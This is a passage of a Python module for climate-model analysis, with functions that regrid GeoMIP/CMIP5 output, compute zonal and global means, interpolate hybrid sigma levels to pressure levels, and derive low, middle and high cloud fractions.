\n# Input data dimensions must be (lat, lon).\n#\n# Inside this function, x is lats, y is lons.\n# For \"method\" (linear, nearest, etc.): see griddata documentation\ndef collocateModels(modelData, modelLats, modelLons, interpLats, interpLons, method='linear'):\n array3D = np.zeros((len(interpLats), len(interpLons), len(modelData.keys()))) #Create empty array to fill in\n interpPoints_x, interpPoints_y = np.meshgrid(interpLats, interpLons)\n interpPoints_x = np.transpose(interpPoints_x)\n interpPoints_y = np.transpose(interpPoints_y)\n i = 0 #loop counter\n for key, value in modelData.items():\n print('Interpolating for model: ')\n print(key)\n #Need to reshape the modelData to be unstructured, and also create lists of lats and lons. \n #For linear and cubic methods, gives NaN for points outside \"convex hull\" of the data, meaning\n #NaNs at poles and the prime meridian. Poles are fine, but I don't want white strip at \n #prime meridian. Get around this by duplicating end values (i.e. \"pad\" the data and longitudes). \n if not(method == 'nearest'):\n #Need to choose a new variable name because otherwise Python changes the original modelData and modelLons called by the function\n #instead off making a copy, which causes a bug if the function is called twice in one script for the same model. \n modelDataPadded = np.append(modelData[key][:,-1:], modelData[key], axis=1) #Append the end value to the beginning\n print('modelDataPadded: ' + str(np.shape(modelDataPadded)))\n modelDataPadded = np.append(modelDataPadded, modelDataPadded[:,1:2], axis=1) #Append the (original) beginning value to the end\n print('modelDataPadded: ' + str(np.shape(modelDataPadded)))\n lonSpacing = modelLons[key][1] - modelLons[key][0] #All models have evenly spaced longitude grid\n modelLonsPadded = np.insert(modelLons[key], 0, modelLons[key][0]-1*lonSpacing) #Add additional longitude to beginning\n print('modelLonsPadded: ' + str(np.shape(modelLonsPadded))) \n modelLonsPadded = np.insert(modelLonsPadded, len(modelLonsPadded), modelLonsPadded[-1]+lonSpacing) #Add additional longitude to end\n print('modelLonsPadded: ' + str(np.shape(modelLonsPadded)))\n flatData = modelDataPadded.flat[:]\n print('flatData: ' + str(np.shape(flatData)))\n flatLons = np.tile(modelLonsPadded, (1, len(modelLats[key]))).flat[:]\n print('flatLons: ' + str(np.shape(flatLons)))\n tiledLats = np.tile(modelLats[key], (len(modelLonsPadded),1))\n print('tiledLats: ' + str(np.shape(tiledLats)))\n else:\n flatData = modelData[key].flat[:]\n flatLons = np.tile(modelLons[key], (1, len(modelLats[key]))).flat[:] \n tiledLats = np.tile(modelLats[key], (len(modelLons[key]), 1))\n transposedTiledLats = np.transpose(tiledLats)\n print('transposedTiledLats: ' + str(np.shape(transposedTiledLats)))\n flatLats = transposedTiledLats.flat[:]\n print('flatLats: ' + str(np.shape(flatLats)))\n points = np.zeros((len(flatLats),2))\n points[:,0] = flatLats\n points[:,1] = flatLons\n print(np.shape(value))\n print(np.shape(points))\n print(np.shape(flatData))\n print(np.shape(interpPoints_x))\n print(np.shape(interpPoints_y))\n array3D[:,:,i] = scipy.interpolate.griddata(points, flatData, (interpPoints_x, interpPoints_y), method=method)\n i = i + 1\n return array3D \n\n \n# Function to return true when no more than a certain number (\"maxDisagreeing\") \n# of elements on a 3d array, looking along a specific dimension, disagree on the sign from the overall consensus. 
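# A minimal, self-contained scipy.interpolate.griddata call (not from the original
# module) of the kind collocateModels builds above: unstructured (lat, lon) points
# with values, interpolated onto a target mesh. The numbers are made up.
import numpy as np
import scipy.interpolate

points = np.array([[0., 0.], [0., 10.], [10., 0.], [10., 10.]])  # (lat, lon) pairs
values = np.array([1., 2., 3., 4.])
lat_t, lon_t = np.meshgrid(np.array([0., 5., 10.]), np.array([0., 5., 10.]),
                           indexing='ij')
regridded = scipy.interpolate.griddata(points, values, (lat_t, lon_t), method='linear')
print(regridded)  # 3x3 array; the four corner values match the inputs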
\n# Anticipate using this along the \"model\" dimension (dim=2) for the output from the \"collocateModels\" function.\ndef arraySignAgreement3D(array, maxDisagreeing, dim = 2):\n    isPositiveArray = array > 0 #(Won't count zero as agreeing on sign of change; this is more conservative)\n    sumPositives = np.sum(isPositiveArray, axis=dim)\n    n = np.shape(array)[dim]\n    # OK, this algorithm is kind of confusing, so here's an explanation of how it works, using the example of 9\n    # models, when I want at least 7 to agree on sign. \n    # I have at each grid point the number of models with a positive sign. \n    # If this number is 0, 1 or 2, then most of the models are negative with at most 2 positives. \n    # If this number is 7, 8, or 9, then most of the models are positive with at most 2 negatives. \n    # I create a Boolean array for each of these cases separately, then use a bitwise or to combine them\n    # (I get an error if I try to do this all in one line). \n    positivesWhenMostNegative = sumPositives <= maxDisagreeing\n    negativesWhenMostPositive = sumPositives >= n - maxDisagreeing\n    returnArray = positivesWhenMostNegative | negativesWhenMostPositive\n    return returnArray\n\n# Function to calculate the mean of a variable from the start of one year to the end of a later year,\n# for multi-year or multidecadal means. Not taking a global mean, despite the name--intended for mapping. \n# Years measured from 0. The optional monthOffset allows for starting from a month other than the first month\n# in the dataset (useful for model runs that don't start in January, for example).\n# \ndef multiYearMean(Data, varname, firstYear, lastYear, monthOffset=0, calendar='360', leapYears='none'):\n    allData = np.squeeze(Data.variables[varname][:]) #Squeeze in case it's one slice of a 4D array\n    #yearMeanData = np.mean(allData[firstYear*12+monthOffset:lastYear*12+12+monthOffset,:,:],axis=0)\n    yearMeanData = enhancedTimeMean(allData[firstYear*12+monthOffset:lastYear*12+12+monthOffset,:,:],\n                                    calendar=calendar, leapYears=leapYears)\n    return yearMeanData \n    \n# Function to calculate the global mean of a variable\n# from the GeoMIP output from the start of one year to the end of a later year. \ndef globalMeanMultiYear(Data, varname, firstYear, lastYear, monthOffset=0): #\"Data\" is a netCDF4 Dataset object\n    yearMeanData = multiYearMean(Data, varname, firstYear, lastYear, monthOffset) #Take time mean; gives 2D array (lat,lon)\n    #print(np.shape(yearMeanData)) #debug\n    latitudes = Data.variables['lat'][:]\n    areaWeights = np.cos(latitudes*np.pi/180)\n    areaWeights2D = np.tile(areaWeights,(np.shape(yearMeanData)[1],1))\n    #print(np.shape(areaWeights2D)) #debug\n    areaWeights2D = np.swapaxes(areaWeights2D,0,1)\n    weighted2DMatrix = yearMeanData*areaWeights2D\n    sumWeighted = np.sum(weighted2DMatrix)\n    sumWeights = np.sum(areaWeights2D)\n    weightedMean = sumWeighted/sumWeights\n    return weightedMean \n    \n# Function to calculate the zonal mean of a variable from the start of one year to the end of a later year. \n# Use the \"multiYearMean\" function above and then average over longitude. 
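# A tiny numeric check (not from the original module) of arraySignAgreement3D
# above: 5 "models" at 2 grid points, allowing at most 1 model to disagree with
# the consensus sign. The values are made up.
import numpy as np
demo = np.zeros((1, 2, 5))
demo[0, 0, :] = [0.2, 0.5, 0.1, 0.4, -0.3]   # 4 positive, 1 negative -> agreement
demo[0, 1, :] = [0.2, 0.5, -0.1, 0.4, -0.3]  # 3 positive, 2 negative -> no agreement
print(arraySignAgreement3D(demo, maxDisagreeing=1))  # [[ True False]]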
\ndef zonalMeanMultiYear(Data, varname, firstYear, lastYear, monthOffset=0, calendar='360', leapYears='none'):\n yearMeanData = multiYearMean(Data, varname, firstYear, lastYear, monthOffset, calendar, leapYears) \n zonalMeanData = np.mean(yearMeanData, axis=1) \n return zonalMeanData\n \n# Function to calculate the latitude of the median precipitation in a zonal mean \n# precipitation profile--that is, latitude at which half of precipitation is \n# to the north and half is to the south.\n#\n# Inputs:\n# zonalMeanData: the zonal mean of the precipitation (calculated e.g. by zonalMeanMultiYear() function)\n# lats: the latitudes corresponding to the zonalMeanData profile\n# minLat: the minimum latitude to consider when taking the median\n# maxLat: the maximum latitude to consider when taking the median\ndef precipMedian(zonalMeanData, lats, minLat, maxLat):\n a = lats >= minLat\n b = lats <= maxLat\n c = a*b\n zonalMeanSubset = zonalMeanData[c]\n latsSubset = lats[c]\n areaWeightedPrecip = zonalMeanSubset*np.cos(latsSubset*np.pi/180)\n totalPrecip = np.sum(areaWeightedPrecip)\n precipFraction = areaWeightedPrecip / totalPrecip\n cumulativePrecipFraction = np.cumsum(precipFraction)\n #Find highest latitude < 50% of rain and lowest latitude > 50% of rain\n indexLowerBound = np.argmin(1./(cumulativePrecipFraction-0.5)) #1/ means largest neg. number is closest to .5 on the - side\n indexUpperBound = np.argmax(1./(cumulativePrecipFraction-0.5)) #1/ means largest pos. number is closest to .5 on the + side\n lowerLat = latsSubset[indexLowerBound]\n upperLat = latsSubset[indexUpperBound]\n #Interpolate between the 2 latitudes based on how close 50% is to either side\n medianLat = lowerLat + (upperLat-lowerLat)*(.5-cumulativePrecipFraction[indexLowerBound])/(\n cumulativePrecipFraction[indexUpperBound]-cumulativePrecipFraction[indexLowerBound])\n return medianLat\n \n \n#Function to calculate zonal mean of multiple years of a height-varying variable already \n#in pressure coordinates (e.g. \"ta\" in all the models, or \"cl\" in the GISS model).\n#Assuming dimensions are (time, plev, lat, lon). Since we're averaging over longitudes and time, \n#result will be 2D array: plev, lat.\n#\n# Inputs: \n# Data: NetCDF4 Dataset object containing the variable of interest. \n# varname: variable name for the variable in the Data object\n#\n# firstYear: first year of the multi-year mean (measured from start of run)\n# lastYear: last \" \" \" \" \" \" \ndef zonalMeanMultiYearPressureCoordinates(Data, varname, firstYear, lastYear):\n datavar = Data.variables[varname][firstYear*12:lastYear*12+12,:,:,:] #time, plev, lat, lon\n #print(datavar[0,:,:,0]) #Debug: see how missing data are handled\n #print(datavar[0,:,:,50]) #Debug: see how missing data are handled\n #What happens is, it reads them in as masked arrays. So mean works fine, but this poses problems for \n #saving output as npy files. \n dataZonalMean = np.nanmean(datavar, axis=3) #Not quite sure how missing data are handled\n dataTimeMean = np.nanmean(dataZonalMean, axis=0)\n return dataTimeMean\n \n \n# Function to interpolate height-varying model output variables to desired pressure levels and calculate\n# zonal mean and multi-year mean. Takes some inspiration from code by Dan Vimont at\n# http://www.aos.wisc.edu/~dvimont/matlab/\n#\n# This version is for Hybrid Sigma vertical coordinates.\n#\n# Inputs: \n# Data: NetCDF4 Dataset object containing the variable of interest. 
\n# varname: variable name for the variable in the Data object\n# pLevels: pressure levels to interpolate to, in hPa. \n# firstYear: first year of the multi-year mean (measured from start of run)\n# lastYear: last \" \" \" \" \" \"\n# modelTag: 2-letter tag for the model (see elsewhere in this module), \n# for model-specific variations in coordinate variable names, etc.\n# DataPS: optional--NetCDF4 Dataset object containing the surface pressure data. This is \n# optional because some of the other files (\"cl\", etc.) already have this. \n# varPS: optional--PS specified as array instead of Dataset object (for CSIRO model)\n#\n# Output:\n# A 2-D Numpy array with latitude on one axis and pressure on the other, and NaNs where no data exist \n# due to terrain (i.e. over Antarctica). Dimension order: pressure, latitude\ndef zonalMeanMultiYearPressureVaryingVariable(Data, varname, pLevels, firstYear, lastYear, modelTag, DataPS='none', varPS = 'none'):\n \n # Extract the data from the objects as well as the surface pressure\n datavar = Data.variables[varname][firstYear*12:lastYear*12+12,:,:,:] #time, lev, lat, lon\n if varPS == 'none': \n if DataPS == 'none':\n PS = Data.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n else:\n PS = DataPS.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n else: #Specify PS as Python array (variable) defined outside the function, rather than NetCDF Dataset object\n PS = varPS\n \n # Calculate pressure at the points where the Data are located.\n # Conversion from hybrid sigma levels to pressure levels\n # based on equation: #P[i,j,k] = a[k]*p0 + b[k]*PS[i,j] \n # But P and PS vary in time whereas a and b don't, so need to use broadcasting. \n B = Data.variables['b'][:] #dimension: lev\n if(modelTag == 'ca' or modelTag == 'ip' or modelTag == 'mp'): #CanESM or IPSL or MPI model\n AkP0 = Data.variables['ap'][:] #Pa; dimension: lev\n else: #BNU or CCSM4 or MIROC model (as of June 27th, 2016) #June 1, 2017: CESM and NorESM also this way\n #P0 = Data.variables['p0'][:] #Reference pressure (Pa)\n P0 = 100000 #Reference pressure (Pa). It's 100000 in all the models, but CCSM and CESM mistakenly used hPa.\n #print(np.shape(P0))\n A = Data.variables['a'][:] #Dimension: lev\n #print(np.shape(A))\n AkP0 = A*P0\n #print(np.shape(AkP0))\n BkPSij = B[None,:,None,None]*PS[:,None,:,:] #Result: 4D array (time, lev, lat, lon)\n print('Shape of 4D array to interpolate:')\n print(np.shape(BkPSij))\n pressureMat = (AkP0[None,:,None,None] + BkPSij)/100. #Divide by 100 to go from Pa to hPa\n \n # Okay, now the hard part:\n # Interpolate the data from the model's native pressure levels to the desired pressure levels. \n # The model's pressure levels vary with time, latitude, and longitude, whereas we need consistent\n # pressure levels for time and zonal averaging. So we have to do a linear interpolation in the \n # vertical coordinate that varies with latitude, longitude and time. But doing this in nested loops\n # is way too slow, so we need to use matrix operations. \n #\n # Further complicating the picture is the fact that sometimes the desired pressure level lies outside\n # the range of the model pressure levels, e.g. due to terrain. To account for this we need to put\n # nans in these places where there is no data, and use nanmean at the end for zonal and time mean. \n #\n # General strategy: only one loop, over the new pressure levels. 
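# The conversion above evaluates p[t,k,j,i] = a[k]*p0 + b[k]*ps[t,j,i] by
# broadcasting; a minimal standalone version (not from the original module) with
# made-up coefficients and surface pressures:
import numpy as np
a = np.array([0.0, 0.1, 0.2])      # hybrid 'a' coefficients, one per level
b = np.array([1.0, 0.8, 0.5])      # hybrid 'b' coefficients
p0 = 100000.                       # reference pressure (Pa)
ps = np.full((2, 4, 5), 98000.)    # surface pressure (time, lat, lon), Pa
p = (a[None, :, None, None]*p0 + b[None, :, None, None]*ps[:, None, :, :]) / 100.
print(p.shape)  # (2, 3, 4, 5): time, lev, lat, lon, now in hPa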
At each desired pressure level, calculate \n # the difference between the native pressures and the desired pressure, and find the vertical \n # indices of the native pressure closest to the desired pressure above and below. Find the native pressures and \n # the data values corresponding to these indices in order to do the linear interpolation. In order to put nans \n # where there is no data, keep track of indices columns where all native pressures are either \n # above or below the desired pressure, and slot in nans in the appropriate place right before the final \n # interpolation calculation.\n\n # First: reshape the native pressures and data into 2D arrays, with time/latitude/longitude all on one axis\n # and vertical coordinate on the other axis. This makes it simpler to extract data at \n # the particular vertical index we want (which varies with time, latitude, and longitude) later on. \n # But we will still use the 4D arrays in other parts of the calculation.\n s = np.shape(pressureMat)\n numTimes = s[0]\n numLevs = s[1]\n numLats = s[2]\n numLons = s[3] \n #Make vertical level the last axis so that columns remain intact when matrices are reshaped \n pressure2D = np.swapaxes(pressureMat,1,3) #Now it's time, lon, lat, level\n pressure2D = np.reshape(pressure2D, (numTimes*numLats*numLons, numLevs))\n data2D = np.swapaxes(datavar,1,3)\n data2D = np.reshape(data2D, (numTimes*numLats*numLons, numLevs))\n \n # Preallocate array to hold interpolated data\n interpMat = np.empty((pressureMat.shape[0], len(pLevels), pressureMat.shape[2], pressureMat.shape[3]))\n \n # Now: loop over the desired pressure levels and interpolate data to each one\n for k in range(0, len(pLevels)):\n print('Interpolating to ' + str(pLevels[k]) + ' hPa')\n \n # This code block: find the upper boundaries of the native pressure and data for interpolation\n print('Positive side')\n pressureMatDiffPos = pressureMat - pLevels[k] #Result: 4D array of differences between native and desired pressure.\n #Positive values: higher native pressure than the level we're filling\n #Negative values: lower native pressure than the level we're filling\n # We're only interested in positive values (higher pressure end) for now, \n # so set negative ones to a very high number and then find the index associated with the minimum along the \n # vertical coordinate. \n pressureMatDiffPos[pressureMatDiffPos < 0] = 1.e10\n upperIndex = np.argmin(pressureMatDiffPos, axis=1) #upperIndex is 3D array in time, lat, lon\n # Next: Record indices where we're trying to interpolate to greater than the maximum native pressure in the column.\n # If this is the case, every value of pressureMatDiffPos in the column will have been set to 1.e10, so the \n # difference between the max and min in the column will be zero.\n # We'll create an array of boolean values that are true if this is one such column. 
They'll be used\n # later to slot in nans.\n nanUpperIndex = np.max(pressureMatDiffPos, axis=1) - np.min(pressureMatDiffPos,axis=1) #3D array: time, lat, lon\n nanUpperIndexBool = np.ones(np.shape(nanUpperIndex), dtype = bool)\n nanUpperIndexBool[nanUpperIndex >= 1.e-99] = False\n # Now, convert the 3D arrays containing vertical indices of interest and boolean values for nans to 1D vectors\n upperIndex1D = np.swapaxes(upperIndex, 1,2) #switched lat and lon to match reshaped matrices above \n upperIndex1D = np.reshape(upperIndex1D, numTimes*numLats*numLons) #Convert to a vector\n nanUpperIndex1D = np.swapaxes(nanUpperIndexBool, 1,2)\n nanUpperIndex1D = np.reshape(nanUpperIndex1D, numTimes*numLats*numLons)\n # Now, extract the native pressure and data values at the upper bound indices we found\n # (I tested this method for extracting data using a sample 2D array in the command line)\n upperPressureBound = pressure2D[range(0,len(upperIndex1D)),upperIndex1D] #Result: 1D vector \n upperDataBound = data2D[range(0,len(upperIndex1D)),upperIndex1D]\n # Set the pressure and data boundary data to nans where we are trying to interpolate to outside the data range\n upperPressureBound[nanUpperIndex1D] = np.nan \n upperDataBound[nanUpperIndex1D] = np.nan \n #print(upperDataBound) #debug output\n \n # This code block: same as above but for the lower boundaries. (far less comments)\n print('Negative side')\n pressureMatDiffNeg = pressureMat - pLevels[k] \n pressureMatDiffNeg[pressureMatDiffNeg > 0] = 1.e10 #This time we are only interested in negative values\n lowerIndex = np.argmin(np.abs(pressureMatDiffNeg), axis=1) \n nanLowerIndex = np.max(pressureMatDiffNeg, axis=1) - np.min(pressureMatDiffNeg,axis=1) \n nanLowerIndexBool = np.ones(np.shape(nanLowerIndex), dtype = bool)\n nanLowerIndexBool[nanLowerIndex >= 1.e-99] = False\n lowerIndex1D = np.swapaxes(lowerIndex, 1,2) \n lowerIndex1D = np.reshape(lowerIndex1D, numTimes*numLats*numLons) \n nanLowerIndex1D = np.swapaxes(nanLowerIndexBool, 1,2)\n nanLowerIndex1D = np.reshape(nanLowerIndex1D, numTimes*numLats*numLons) \n lowerPressureBound = pressure2D[range(0,len(lowerIndex1D)),lowerIndex1D] \n lowerDataBound = data2D[range(0,len(lowerIndex1D)),lowerIndex1D]\n lowerPressureBound[nanLowerIndex1D] = np.nan \n lowerDataBound[nanLowerIndex1D] = np.nan\n #print(lowerDataBound) #debug output\n \n # Now: linearly interpolate the data in log pressure space \n # (interpolating in log pressure means interpolating linearly w.r.t. height)\n interpVec = lowerDataBound+(upperDataBound-lowerDataBound)*(np.log(pLevels[k])-np.log(lowerPressureBound))/(\n np.log(upperPressureBound)-np.log(lowerPressureBound)) \n \n # Finally: Reshape to 3D matrix to put in the later 4D matrix\n interpSlice = np.reshape(interpVec, (numTimes, numLons, numLats)) #time, lon, lat for consistency with above\n interpSlice = np.swapaxes(interpSlice,1,2) # switch lat and lon again\n interpMat[:,k,:,:] = interpSlice #Populate the returned matrix\n \n print('Finished k = ' + str(k))\n \n # Now we have a 4D matrix of interpolated data in time, pressure, latitude and longitude.\n # Now take zonal and time means\n interpMatZonalMean = np.nanmean(interpMat, axis=3)\n interpMatTimeMean = np.nanmean(interpMatZonalMean, axis=0)\n \n return interpMatTimeMean\n \n#Similar function for hybrid height coordinates, for the HadGEM2-ES model. \n\n \n \n \n# Function similar to above but without the zonal or time means, to return a 4D array that I can do other \n# things with in wrapper functions. 
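# The interpolation step above is linear in log pressure; a one-point worked
# example (not from the original module) with made-up values:
import numpy as np
p_low, p_high = 900., 1000.   # native pressures bracketing the target (hPa)
x_low, x_high = 280., 285.    # data at those two pressures (e.g. temperature, K)
p_t = 950.
x_t = x_low + (x_high - x_low)*(np.log(p_t) - np.log(p_low))/(np.log(p_high) - np.log(p_low))
print(round(x_t, 2))  # 282.57, just above the midpoint because log spacing is uneven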
Subset in time (to save on computation) but don't take time mean yet. \n# This time will not have model as input; instead check for which format of hybrid sigma coordinates is used.\n#\n# Inputs: \n# Data: NetCDF4 Dataset object containing the variable of interest. \n# varname: variable name for the variable in the Data object\n# pLevels: pressure levels to interpolate to, in hPa. \n# firstYear: first year of the time subset (measured from start of run, where start year is 0)\n# lastYear: last \" \" \" \" \" \"\n# DataPS: optional--NetCDF4 Dataset object containing the surface pressure output. This is \n# optional because some of the other files (\"cl\", etc.) already have this. \n#\n# Output:\n# A 4-D Numpy array with dimensions: time, pressure, lat, lon\n# and NaNs where no data exist due to terrain (i.e. over Antarctica). \n#\ndef convertHybridSigmaToPressureCoords(Data, varname, pLevels, firstYear, lastYear, DataPS='none'):\n # Extract the output from the objects, and do time subset\n datavar = Data.variables[varname][firstYear*12:lastYear*12+12,:,:,:] #time, lev, lat, lon\n if DataPS == 'none':\n PS = Data.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n else:\n PS = DataPS.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n \n #See above function for more detailed documentation.\n \n # Calculate pressure at the points where the Data are located.\n # Conversion from hybrid sigma levels to pressure levels\n # based on equation: #P[i,j,k] = a[k]*p0 + b[k]*PS[i,j] \n # But P and PS vary in time whereas a and b don't, so need to use broadcasting. \n B = Data.variables['b'][:] #dimension: lev\n if('ap' in Data.variables.keys()): #CanESM or IPSL or MPI model\n AkP0 = Data.variables['ap'][:] #Pa; dimension: lev\n else: #BNU or CCSM4 or MIROC model (as of June 27th, 2016) #June 1, 2017: CESM and NorESM also this way\n #P0 = Data.variables['p0'][:] #Reference pressure (Pa)\n P0 = 100000 #Reference pressure (Pa). It's 100000 in all the models, but CCSM and CESM mistakenly used hPa.\n A = Data.variables['a'][:] #Dimension: lev\n AkP0 = A*P0\n BkPSij = B[None,:,None,None]*PS[:,None,:,:] #Result: 4D array (time, lev, lat, lon)\n pressureMat = (AkP0[None,:,None,None] + BkPSij)/100. 
#Divide by 100 to go from Pa to hPa\n \n #Reshape output to 2D array \n s = np.shape(pressureMat)\n numTimes = s[0]\n numLevs = s[1]\n numLats = s[2]\n numLons = s[3] \n #Make vertical level the last axis so that columns remain intact when matrices are reshaped \n pressure2D = np.swapaxes(pressureMat,1,3) #Now it's time, lon, lat, level\n pressure2D = np.reshape(pressure2D, (numTimes*numLats*numLons, numLevs))\n data2D = np.swapaxes(datavar,1,3)\n data2D = np.reshape(data2D, (numTimes*numLats*numLons, numLevs))\n \n # Preallocate array to hold interpolated data\n interpMat = np.empty((pressureMat.shape[0], len(pLevels), pressureMat.shape[2], pressureMat.shape[3]))\n \n # Now: loop over the desired pressure levels and interpolate data to each one\n for k in range(0, len(pLevels)):\n print('Interpolating to ' + str(pLevels[k]) + ' hPa')\n \n # This code block: find the upper boundaries of the native pressure and data for interpolation\n print('Positive side')\n pressureMatDiffPos = pressureMat - pLevels[k] #Result: 4D array of differences between native and desired pressure.\n pressureMatDiffPos[pressureMatDiffPos < 0] = 1.e10\n upperIndex = np.argmin(pressureMatDiffPos, axis=1) #upperIndex is 3D array in time, lat, lon\n nanUpperIndex = np.max(pressureMatDiffPos, axis=1) - np.min(pressureMatDiffPos,axis=1) #3D array: time, lat, lon\n nanUpperIndexBool = np.ones(np.shape(nanUpperIndex), dtype = bool)\n nanUpperIndexBool[nanUpperIndex >= 1.e-99] = False\n upperIndex1D = np.swapaxes(upperIndex, 1,2) #switched lat and lon to match reshaped matrices above \n upperIndex1D = np.reshape(upperIndex1D, numTimes*numLats*numLons) #Convert to a vector\n nanUpperIndex1D = np.swapaxes(nanUpperIndexBool, 1,2)\n nanUpperIndex1D = np.reshape(nanUpperIndex1D, numTimes*numLats*numLons)\n upperPressureBound = pressure2D[range(0,len(upperIndex1D)),upperIndex1D] #Result: 1D vector \n upperDataBound = data2D[range(0,len(upperIndex1D)),upperIndex1D]\n # Set the pressure and data boundary data to nans where we are trying to interpolate to outside the data range\n upperPressureBound[nanUpperIndex1D] = np.nan \n upperDataBound[nanUpperIndex1D] = np.nan \n \n # This code block: same as above but for the lower boundaries. \n print('Negative side')\n pressureMatDiffNeg = pressureMat - pLevels[k] \n pressureMatDiffNeg[pressureMatDiffNeg > 0] = 1.e10 #This time we are only interested in negative values\n lowerIndex = np.argmin(np.abs(pressureMatDiffNeg), axis=1) \n nanLowerIndex = np.max(pressureMatDiffNeg, axis=1) - np.min(pressureMatDiffNeg,axis=1) \n nanLowerIndexBool = np.ones(np.shape(nanLowerIndex), dtype = bool)\n nanLowerIndexBool[nanLowerIndex >= 1.e-99] = False\n lowerIndex1D = np.swapaxes(lowerIndex, 1,2) \n lowerIndex1D = np.reshape(lowerIndex1D, numTimes*numLats*numLons) \n nanLowerIndex1D = np.swapaxes(nanLowerIndexBool, 1,2)\n nanLowerIndex1D = np.reshape(nanLowerIndex1D, numTimes*numLats*numLons) \n lowerPressureBound = pressure2D[range(0,len(lowerIndex1D)),lowerIndex1D] \n lowerDataBound = data2D[range(0,len(lowerIndex1D)),lowerIndex1D]\n lowerPressureBound[nanLowerIndex1D] = np.nan \n lowerDataBound[nanLowerIndex1D] = np.nan\n \n # Now: linearly interpolate the data in log pressure space \n # (interpolating in log pressure means interpolating linearly w.r.t. 
height)\n        interpVec = lowerDataBound+(upperDataBound-lowerDataBound)*(np.log(pLevels[k])-np.log(lowerPressureBound))/(\n            np.log(upperPressureBound)-np.log(lowerPressureBound)) \n        \n        # Finally: Reshape to 3D matrix to put in the later 4D matrix\n        interpSlice = np.reshape(interpVec, (numTimes, numLons, numLats)) #time, lon, lat for consistency with above\n        interpSlice = np.swapaxes(interpSlice,1,2) # switch lat and lon again\n        interpMat[:,k,:,:] = interpSlice #Populate the returned matrix\n        \n        print('Finished k = ' + str(k))\n    \n    return interpMat\n    \n# Function to obtain the low, middle and high cloud fraction from the \"cl\" output, based on output from above,\n# averaged over time. Assumes time subset has already been done.\n# Assumes random overlap (i.e. clouds in adjacent layers independent).\n# Do overlap calculation before time mean. \n# Returns 3 2D arrays for low, middle and high cloud fraction, in a dict with keys 'low', 'middle', 'high'.\n# Input: \"clPressure\": 4D array (time, pressure, lat, lon) of cloud fractions, e.g. obtained from above. \n#        \"pLevels\": the pressure levels at which the cloud fractions are specified\n#        \"divide100\": Whether to divide cloud fraction by 100 first. This is true by default, but 2 models\n#            (BNU and CCSM4) didn't follow CMIP5 conventions and reported fraction instead of percent. \n#        monthWeights: 12-member array of weights intended for use with \"np.ma.average\", associated with each month. \n#            Intended for seasonal means, e.g. DJF: [1,1,0,0,0,0,0,0,0,0,0,1]. \n#            Counted from first month in the \"clPressure\" array, so if first month is not January, need\n#            to adjust input weights array. By default, not used and annual mean taken.\ndef calcLowMiddleHighClouds(clPressure, pLevels, divide100=True, monthWeights='none'):\n    if divide100:\n        clPressure = clPressure / 100.\n    #Subset to low, middle and high \n    clLow = clPressure[:, pLevels >= 680, :, :]\n    clMiddle = clPressure[:, np.logical_and(pLevels < 680, pLevels >= 440), :, :]\n    clHigh = clPressure[:, pLevels < 440, :, :]\n    #Calculate cloud fractions in low, middle and high clouds using random overlap assumption. \n    #The probability of clouds in any layer is one minus the probability of clouds in no layers. 
\n    #The probability of clouds in no layer is the product of 1 - cloud fraction in each layer, if \n    #the layers are independent.\n    #(e.g. two independent layers with fractions 0.5 and 0.2 give 1 - 0.5*0.8 = 0.6 total cover)\n    oneMinus_clLow = 1.0 - clLow\n    oneMinus_clMiddle = 1.0 - clMiddle \n    oneMinus_clHigh = 1.0 - clHigh\n    #Set nans to 1.0 before taking product\n    oneMinus_clLow[np.isnan(oneMinus_clLow)] = 1.0\n    oneMinus_clMiddle[np.isnan(oneMinus_clMiddle)] = 1.0\n    oneMinus_clHigh[np.isnan(oneMinus_clHigh)] = 1.0\n    #Do the multiplication\n    clRandomLow = 1 - np.prod(oneMinus_clLow, axis=1) #should now have dimensions time, lat, lon\n    #print(np.shape(clRandomLow)) #debug\n    clRandomMiddle = 1 - np.prod(oneMinus_clMiddle, axis=1)\n    clRandomHigh = 1 - np.prod(oneMinus_clHigh, axis=1)\n    #Create dict to return, and do time averaging\n    returnDict = dict()\n    if monthWeights == 'none': #annual mean\n        returnDict['low'] = np.mean(clRandomLow, axis=0)\n        returnDict['middle'] = np.mean(clRandomMiddle, axis=0)\n        returnDict['high'] = np.mean(clRandomHigh, axis=0)\n    else: #seasonal mean\n        tiledWeights = np.tile(monthWeights,np.shape(clRandomLow)[0]//12) #integer division: np.tile needs an int repeat count\n        returnDict['low'] = np.average(clRandomLow, weights=tiledWeights, axis=0)\n        returnDict['middle'] = np.average(clRandomMiddle, weights=tiledWeights, axis=0)\n        returnDict['high'] = np.average(clRandomHigh, weights=tiledWeights, axis=0)\n    return returnDict\n    \n#Version of the above for models in height coordinates (i.e. HadGEM2-ES)\n#Boundaries: 3250, 6500 m, corresponding to 680 and 440 hPa respectively, using standard atmosphere.\ndef calcLowMiddleHighCloudsHeight(clHeight, zLevels, divide100=True, monthWeights='none'):\n    if divide100: \n        clHeight = clHeight / 100. \n    #subset to low, middle and high\n    clLow = clHeight[:, zLevels <= 3250, :, :]\n    clMiddle = clHeight[:, np.logical_and(zLevels > 3250, zLevels <= 6500), :, :]\n    clHigh = clHeight[:, zLevels > 6500, :, :]\n    #Below this line, same as the pressure version\n    oneMinus_clLow = 1.0 - clLow\n    oneMinus_clMiddle = 1.0 - clMiddle \n    oneMinus_clHigh = 1.0 - clHigh\n    oneMinus_clLow[np.isnan(oneMinus_clLow)] = 1.0\n    oneMinus_clMiddle[np.isnan(oneMinus_clMiddle)] = 1.0\n    oneMinus_clHigh[np.isnan(oneMinus_clHigh)] = 1.0\n    clRandomLow = 1 - np.prod(oneMinus_clLow, axis=1) \n    clRandomMiddle = 1 - np.prod(oneMinus_clMiddle, axis=1)\n    clRandomHigh = 1 - np.prod(oneMinus_clHigh, axis=1)\n    returnDict = dict()\n    if monthWeights == 'none': #annual mean\n        returnDict['low'] = np.mean(clRandomLow, axis=0)\n        returnDict['middle'] = np.mean(clRandomMiddle, axis=0)\n        returnDict['high'] = np.mean(clRandomHigh, axis=0)\n    else: #seasonal mean\n        tiledWeights = np.tile(monthWeights,np.shape(clRandomLow)[0]//12)\n        returnDict['low'] = np.average(clRandomLow, weights=tiledWeights, axis=0)\n        returnDict['middle'] = np.average(clRandomMiddle, weights=tiledWeights, axis=0)\n        returnDict['high'] = np.average(clRandomHigh, 